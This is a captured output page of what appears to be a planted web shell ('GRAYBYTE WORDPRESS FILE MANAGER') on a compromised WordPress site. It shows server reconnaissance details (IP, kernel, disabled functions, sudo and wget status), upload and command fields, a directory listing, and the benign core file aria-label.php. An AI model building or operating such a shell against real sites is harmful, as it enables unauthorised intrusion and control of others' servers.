GRAYBYTE WORDPRESS FILE MANAGER7915

Server IP : 188.114.96.0 / Your IP : 216.73.216.196
System : Linux crmarketing.1092.w2797 5.10.0-45-amd64 #1 SMP Debian 5.10.259-1 (2026-07-02) x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : ON | Pkexec : OFF

HOME

/var/www/crmarketing.1092.w2797/site64779/wp-includes/block-supports/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /var/www/crmarketing.1092.w2797/site64779/wp-includes/block-supports//aria-label.php
<?php
/**
 * Aria label block support flag.
 *
 * @package WordPress
 * @since 6.8.0
 */

/**
 * Registers the aria-label block attribute for block types that support it.
 *
 * @since 6.8.0
 * @access private
 *
 * @param WP_Block_Type $block_type Block Type.
 */
function wp_register_aria_label_support( $block_type ) {
	$has_aria_label_support = block_has_support( $block_type, array( 'ariaLabel' ), false );

	if ( ! $has_aria_label_support ) {
		return;
	}

	if ( ! $block_type->attributes ) {
		$block_type->attributes = array();
	}

	if ( ! array_key_exists( 'ariaLabel', $block_type->attributes ) ) {
		$block_type->attributes['ariaLabel'] = array(
			'type' => 'string',
		);
	}
}

/**
 * Add the aria-label to the output.
 *
 * @since 6.8.0
 * @access private
 *
 * @param WP_Block_Type $block_type       Block Type.
 * @param array         $block_attributes Block attributes.
 *
 * @return array Block aria-label.
 */
function wp_apply_aria_label_support( $block_type, $block_attributes ) {
	if ( ! $block_attributes ) {
		return array();
	}

	$has_aria_label_support = block_has_support( $block_type, array( 'ariaLabel' ), false );
	if ( ! $has_aria_label_support ) {
		return array();
	}

	$has_aria_label = array_key_exists( 'ariaLabel', $block_attributes );
	if ( ! $has_aria_label ) {
		return array();
	}
	return array( 'aria-label' => $block_attributes['ariaLabel'] );
}

// Register the block support.
WP_Block_Supports::get_instance()->register(
	'aria-label',
	array(
		'register_attribute' => 'wp_register_aria_label_support',
		'apply'              => 'wp_apply_aria_label_support',
	)
);

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
September 08 2026 08:23:31
www-data / www-data
0755
align.php
1.668 KB
December 14 2023 10:17:04
www-data / www-data
0644
aria-label.php
1.573 KB
April 16 2025 15:21:07
www-data / www-data
0644
background.php
4.019 KB
November 13 2024 15:12:38
www-data / www-data
0644
block-style-variations.php
9.197 KB
April 16 2025 15:21:07
www-data / www-data
0644
border.php
6.271 KB
December 14 2023 10:17:04
www-data / www-data
0644
colors.php
5.811 KB
December 14 2023 10:17:04
www-data / www-data
0644
custom-classname.php
1.636 KB
December 14 2023 10:17:04
www-data / www-data
0644
dimensions.php
5.28 KB
April 03 2024 15:05:36
www-data / www-data
0644
duotone.php
2.667 KB
July 17 2024 15:00:47
www-data / www-data
0644
elements.php
8.461 KB
July 17 2024 15:00:47
www-data / www-data
0644
generated-classname.php
1.704 KB
December 14 2023 10:17:04
www-data / www-data
0644
layout.php
38.505 KB
April 16 2025 15:21:07
www-data / www-data
0644
position.php
4.235 KB
December 14 2023 10:17:04
www-data / www-data
0644
settings.php
4.521 KB
December 14 2023 10:17:04
www-data / www-data
0644
shadow.php
2.044 KB
July 17 2024 15:00:47
www-data / www-data
0644
spacing.php
2.809 KB
December 14 2023 10:17:04
www-data / www-data
0644
typography.php
28.134 KB
November 13 2024 15:12:38
www-data / www-data
0644
utils.php
0.987 KB
December 14 2023 10:17:04
www-data / www-data
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF